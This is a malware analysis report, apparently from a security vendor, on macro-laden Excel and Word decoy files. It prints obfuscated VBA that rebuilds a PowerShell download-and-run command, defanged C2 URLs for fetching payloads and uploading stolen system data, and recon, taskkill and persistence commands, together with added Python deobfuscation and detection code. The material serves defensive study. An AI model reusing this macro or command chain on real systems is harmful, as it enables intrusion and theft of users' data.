Malware Disguised as Normal Excel and Word Documents

The ASEC analysis team has recently confirmed that document files carrying a particular type of malicious macro are being distributed continuously. The files are distributed under various filenames, as shown below. Because they all contain content that makes them look like normal documents, users must handle them with caution.

  • Constitution Day International Academic Forum.doc
  • 28th North Korea-South Korea Relations Experts Discussion***.doc
  • Honorarium Template.doc
  • email_20210516.xls
  • email_20210414.xls

Recently discovered Excel files carry the date of distribution in their filenames, such as 'email_20210516.xls', and urge users to enable macros. The attackers also added the details of domestic card companies at the bottom of the pages to disguise the files as documents sent by those companies.

When users click Enable Content, a window for entering a mail confirmation number appears, making the file look like a normal document. It asks users to enter their date of birth as a 6-digit number. If a 6-digit number is not entered, a popup appears.

After the 6-digit number is entered, the sheet hidden inside the file, shown below, appears. For this sheet, the attacker used the details of a bank instead of the card company impersonated above.

Upon entering password

The malicious macro in the Excel file runs automatically once users enable macros. The macro is a PowerShell command that connects to hxxp://manstr.myartsonline.com/pc/kj.txt to download and run additional scripts.

Process tree upon running macro

The Word file, which contains the same malicious macro as the Excel file above, was distributed under the filename 'Constitution Day International Academic Forum.doc'. It contains an image urging users to enable macros.

Upon clicking Enable Content, the file shows a normal-looking document.

As shown below, the Word file uses macro code similar to that found in the Excel file: the variable names and the string-building format are the same. When the macro runs, it connects to hxxp://rukagu.mypressonline.com/le/yj.txt to download and run additional scripts.

Private Sub Workbook_Open()
Sheets("Sheet1").Select
Sheets("Sheet2").Visible = True
Sheets("Sheet1").Visible = False
eifhhdfasfiedf
End Sub

Function eifhhdfasfiedf()
Set djfeihfidkasljf = CreateObject("Shell.Application")
Dim dfgdfjiejfjdshaj As String
Dim yhjhfjdhfdhfuesk(10) As String
' Every literal is padded with the junk token "+e+z+"; Replace strips it to rebuild the real string
dfgdfjiejfjdshaj = "+e+z+p+e+z+o+e+z+w+e+z+e+e+z+r+e+z+s+e+z+h+e+z+e+e+z+l+e+z+l+e+z+.+e+z+e+e+z+x+e+z+e+e+z+"
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, "+e+z+", "")
yhjhfjdhfdhfuesk(0) = "+e+z+[+e+z+s+e+z+t+e+z+r+e+z+i+e+z+n+e+z+g+e+z+]+e+z+$+e+z+a+e+z+=+e+z+{+e+z+(+e+z+N+e+z+"
dfjdiafjlij = Replace(yhjhfjdhfdhfuesk(0), "+e+z+", "")
yhjhfjdhfdhfuesk(1) = "+e+z+e+e+z+w+e+z+-+e+z+O+e+z+b+e+z+j+e+z+e+e+z+c+e+z+t +e+z+N+e+z+e+e+z+t+e+z+.+e+z+W+e+z+e+e+z+b+e+z+C+e+z+l+e+z+i+e+z+"
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(1), "+e+z+", "")
<omitted>
yhjhfjdhfdhfuesk(6) = "+e+z+l+e+z+o+e+z+a+e+z+d+e+z+S+e+z+t+e+z+r+e+z+'+e+z+)+e+z+;+e+z+$+e+z+c+e+z+=+e+z+i+e+z+e+e+z+x+e+z+ +e+z+$+e+z+b+e+z+;+e+z+i+e+z+e+e+z+x +e+z+$+e+z+c+e+z+"
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(6), "+e+z+", "")
' Runs the rebuilt program name with the rebuilt argument string; the final 0 hides the window
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfjdiafjlij, "", "open", 0
End Function
Excel macro code

Private Sub Document_Open()
asfwefsadfasfsadf
asfwqfasfsdafas
sdfqefsdafsadfwqefsadf
eifhhdfasfiedf
End Sub
<omitted>
Function eifhhdfasfiedf()
Set djfeihfidkasljf = CreateObject("Shell.Application")
Dim dfgdfjiejfjdshaj As String
Dim yhjhfjdhfdhfuesk(10) As String
' Same construction as the Excel macro; only the junk token changes to "tuwhn"
dfgdfjiejfjdshaj = "tuwhnptuwhnotuwhnwtuwhnetuwhnrtuwhnstuwhnhtuwhnetuwhnltuwhnltuwhn.tuwhnetuwhnxtuwhnetuwhn"
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, "tuwhn", "")
yhjhfjdhfdhfuesk(0) = "tuwhn[tuwhnstuwhnttuwhnrtuwhnituwhnntuwhngtuwhn]tuwhn$tuwhnatuwhn=tuwhn{tuwhn(tuwhnNtuwhnetuwhnwtuwhn-tuwhnOtuwhnbtuwhnjtuwhnetuwhnctuwhnttuwhn "
dfjdiafjlij = Replace(yhjhfjdhfdhfuesk(0), "tuwhn", "")
yhjhfjdhfdhfuesk(1) = "tuwhnNtuwhnetuwhnttuwhn.tuwhnWtuwhnetuwhnbtuwhnCtuwhnltuwhnituwhnetuwhnntuwhnttuwhn)tuwhn.tuwhnDtuwhnntuwhngtuwhn"
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(1), "tuwhn", "")
<omitted>
yhjhfjdhfdhfuesk(5) = "etuwhnxtuwhn tuwhn$tuwhnbtuwhn;tuwhnituwhnetuwhnxtuwhn tuwhn$tuwhnctuwhn"
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(5), "tuwhn", "")
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfjdiafjlij, "", "open", 0
End Function
Word macro code
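As an added example (not code from the post or from the samples), the following Python script statically replays the string building both macros rely on: junk-token padding, Replace to strip the token, and & concatenation, then reports what ShellExecute would launch. It runs over a constructed excerpt of the Excel macro lines quoted above (variable names are the macro's own, straight quotes, omitted lines dropped) and treats the token generically, so the Word variant's "tuwhn" resolves the same way.

```python
import re

# Constructed excerpt of the Excel macro quoted above (variable names are the
# macro's own; the junk token is "+e+z+"). Straight quotes, omitted lines dropped.
EXCEL_MACRO = r'''
dfgdfjiejfjdshaj = "+e+z+p+e+z+o+e+z+w+e+z+e+e+z+r+e+z+s+e+z+h+e+z+e+e+z+l+e+z+l+e+z+.+e+z+e+e+z+x+e+z+e+e+z+"
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, "+e+z+", "")
yhjhfjdhfdhfuesk(0) = "+e+z+[+e+z+s+e+z+t+e+z+r+e+z+i+e+z+n+e+z+g+e+z+]+e+z+$+e+z+a+e+z+=+e+z+{+e+z+(+e+z+N+e+z+"
dfjdiafjlij = Replace(yhjhfjdhfdhfuesk(0), "+e+z+", "")
yhjhfjdhfdhfuesk(1) = "+e+z+e+e+z+w+e+z+-+e+z+O+e+z+b+e+z+j+e+z+e+e+z+c+e+z+t +e+z+N+e+z+e+e+z+t+e+z+.+e+z+W+e+z+e+e+z+b+e+z+C+e+z+l+e+z+i+e+z+"
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(1), "+e+z+", "")
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfjdiafjlij, "", "open", 0
'''

# var = "literal"            (var may be an array element such as name(0))
LITERAL = re.compile(r'^(\w+(?:\(\d+\))?)\s*=\s*"(.*)"\s*$')
# dest = [prefix &] Replace(src, "token", "")
REPLACE = re.compile(r'^(\w+)\s*=\s*(?:(\w+)\s*&\s*)?Replace\((\w+(?:\(\d+\))?),\s*"([^"]*)",\s*""\)\s*$')
# obj.ShellExecute program, arguments, ...
SHELL = re.compile(r'^\w+\.ShellExecute\s+(\w+),\s*(\w+),')

def deobfuscate(vba: str) -> dict:
    """Replay the macro's string building statically and report what
    ShellExecute would launch, plus the junk token(s) used for padding."""
    vba = vba.replace("\u201c", '"').replace("\u201d", '"')  # curly quotes from copy/paste
    env, tokens, result = {}, set(), {}
    for line in vba.splitlines():
        line = line.strip()
        if m := LITERAL.match(line):
            env[m.group(1)] = m.group(2)
        elif m := REPLACE.match(line):
            dest, prefix, src, token = m.groups()
            tokens.add(token)
            stripped = env[src].replace(token, "")          # VBA Replace: all occurrences
            env[dest] = (env[prefix] if prefix else "") + stripped
        elif m := SHELL.match(line):
            result["program"] = env[m.group(1)]
            result["arguments"] = env[m.group(2)]
    result["tokens"] = sorted(tokens)
    return result

if __name__ == "__main__":
    print(deobfuscate(EXCEL_MACRO))
```

The recovered program name and the leading "[string]$a={(New-Object Net.WebCli" fragment match the PowerShell download behaviour the post describes; the same approach works on a fully dumped macro once the omitted lines are included.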


Both the Excel and Word files were likely distributed by the same attacker, as each downloads a script from its own C2 that performs exactly the same behaviors: leaking user information, downloading additional scripts, and so on. The following shows the script confirmed on the C2 (hxxp://warms.atwebpages.com/rh/ee.txt) contacted by the distributed file named Honorarium Template.doc.

Script confirmed in C2

Its features include uploading the user's PC information and downloading additional files. The script collects the information listed below, saves the collected data to the %APPDATA%\Ahnlab\Ahnlab.hwp file, and uploads it to hxxp://warms.atwebpages.com/rh/post.php.

  • Recent Files
  • Program Files (x86) Files and Folders
  • systeminfo Information
  • tasklist Information

Created log file

It then downloads a specific string from hxxp://warms.atwebpages.com/rh/ee.down, decodes it, and runs it in the background via the Start-Job -ScriptBlock command. It also attempts to create a registry value named Alzipupdate under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, but the data is not registered properly.

The team could not confirm what the code does afterward because the download URL is inaccessible. However, an additional malicious script was discovered on the same domain. The following shows the additional script found at hxxp://warms.atwebpages.com/rh/hollow64.txt.

Additionally found script

The script runs %windir%\SysWOW64\cmd.exe, downloads the data shown below from hxxp://warms.atwebpages.com/rh/baymax[numbers].txt, and injects it into the process it started earlier to perform malicious behaviors.

Additionally downloaded malicious data

The malicious PE injected into cmd.exe saves the data in the directory that contains the most recently used document files, the data in the Program Files directory, and the systeminfo output to %APPDATA%\Microsoft\Network\Alzip and sends them to wariii.mypressonline[.]com/home/jpg/downpost.php. It then downloads additional malicious files from hxxp://wariii.mypressonline.com/home/jpg/downdownload.php?filename=baymax[numbers], saves them as %APPDATA%\Microsoft\Network\Alzip.dll, and runs them.

The downloaded Alzip.dll injects a malicious PE into svchost.exe, creates %APPDATA%\pagefile.sys, and runs it. The pagefile.sys that is ultimately run collects user information and sends it by e-mail.

pagefile.sys property

When pagefile.sys runs, it copies itself to %AppData%\OneDriver\down\hancom.dll and checks for registry keys such as SOFTWARE\\VMware, Inc.\\Vmware Tools and SYSTEM\\CurrentControlSet\\Control\\VirtualDeviceDrivers. If such a key exists in the operating environment, the file terminates. It then runs cmd.exe /c taskkill /f /im daumcleaner.exe to terminate daumcleaner.exe and registers hancom.dll under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dropbox.

Created Registry

It also runs the following commands to save the collected information to %AppData%\OneDriver\out\PI_001.dat and then sends the file to Flower9801@hanmail[.]net.

  • cmd.exe /c ipconfig/all >>"%AppData%\OneDriver\out\PI_001.dat" & arp -a >"%AppData%\OneDriver\out\PI_001.dat"
  • cmd.exe /c systeminfo >>"%AppData%\OneDriver\out\PI_001.dat"
  • cmd.exe /c tasklist >>"%AppData%\OneDriver\out\PI_001.dat"

List of execution commands
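As an added example (not from the post or the samples), the following Python detector turns the behaviours described for the C2 script and for pagefile.sys into host-level checks: Office spawning PowerShell, recon output redirected into the staging files, the taskkill of daumcleaner.exe, a process running from %AppData%\pagefile.sys, and the dropbox/Alzipupdate Run values. The Sysmon-style records are constructed; their field layout, the user profile path and the SID are assumptions.

```python
import ntpath
import re

# Constructed Sysmon-style records (not real telemetry) modelling the chain the
# post describes; field names, user path and SID are assumptions.
EVENTS = [
    {"id": 1, "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe [string]$a={(New-Object Net.WebClient"},
    {"id": 1, "parent": r"C:\Users\u\AppData\Roaming\pagefile.sys",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c taskkill /f /im daumcleaner.exe"},
    {"id": 1, "parent": r"C:\Users\u\AppData\Roaming\pagefile.sys",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c systeminfo >>"C:\Users\u\AppData\Roaming\OneDriver\out\PI_001.dat"'},
    {"id": 13, "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\dropbox",
     "details": r"C:\Users\u\AppData\Roaming\OneDriver\down\hancom.dll"},
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},  # benign control record
]

OFFICE = {"excel.exe", "winword.exe"}
STAGING = r'\\(OneDriver\\out\\PI_001\.dat|Ahnlab\\Ahnlab\.hwp)'   # staging files from the post

def base(path):
    return ntpath.basename(path).lower()   # ntpath: backslash paths on any host

# (rule name, Sysmon event id, predicate over one record)
RULES = [
    ("office_spawns_powershell", 1,
     lambda e: base(e["parent"]) in OFFICE and base(e["image"]) == "powershell.exe"),
    ("recon_redirected_to_staging_file", 1,
     lambda e: re.search(r"\b(systeminfo|tasklist|ipconfig|arp)\b.*>>?\s*\"?[^\"]*" + STAGING,
                         e["cmdline"], re.I) is not None),
    ("kills_daumcleaner", 1,
     lambda e: re.search(r"taskkill\s+/f\s+/im\s+daumcleaner\.exe", e["cmdline"], re.I) is not None),
    ("pagefile_sys_in_appdata_as_process", 1,
     lambda e: any(re.search(r"\\AppData\\Roaming\\pagefile\.sys$", p, re.I) for p in (e["image"], e["parent"]))),
    ("run_key_persistence", 13,
     lambda e: re.search(r"\\CurrentVersion\\Run\\(dropbox|Alzipupdate)$", e["target"], re.I) is not None),
]

def detect(events):
    """Return {(record index, rule name)} for every record that trips a rule."""
    hits = set()
    for i, e in enumerate(events):
        for name, event_id, pred in RULES:
            if e["id"] == event_id and pred(e):
                hits.add((i, name))
    return hits
```

Each rule is narrow on purpose: the Run value names, staging paths and the daumcleaner.exe kill are the page's own indicators, while the Office-to-PowerShell rule catches the initial macro stage regardless of the junk token used.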

The files with the other filenames listed earlier were not collected, but since both analyzed files use the same macro code, the others are likely to perform the same malicious behaviors described above.

Malicious document files containing normal-looking content have been distributed steadily for a long time. Because they display different screens after the malicious macro runs, it is difficult for users to recognize that these files are malicious. Users should be cautious of files that urge them to enable macros and refrain from opening files from unknown sources.

AhnLab's anti-malware product, V3, detects and blocks the malware using the aliases below.

[File Detection]
Downloader/DOC.Generic
Downloader/XLS.Agent
Trojan/Win.Agent.C4480883
Trojan/Win.Agent.C4408018

[IOC Info]
1269e2b00fd323a7748215124cb058cd
811f8c88cda9e8c4f448aa6f380e5a93
e61aafd8d7065a2fa8d5a343098b98cb
0629fd238259d7df7aa22ca82ac6b93e
hxxp://warms.atwebpages.com
hxxp://rukagu.mypressonline.com
hxxp://manstr.myartsonline.com
hxxp://wariii.mypressonline.com

Categories: Malware Information
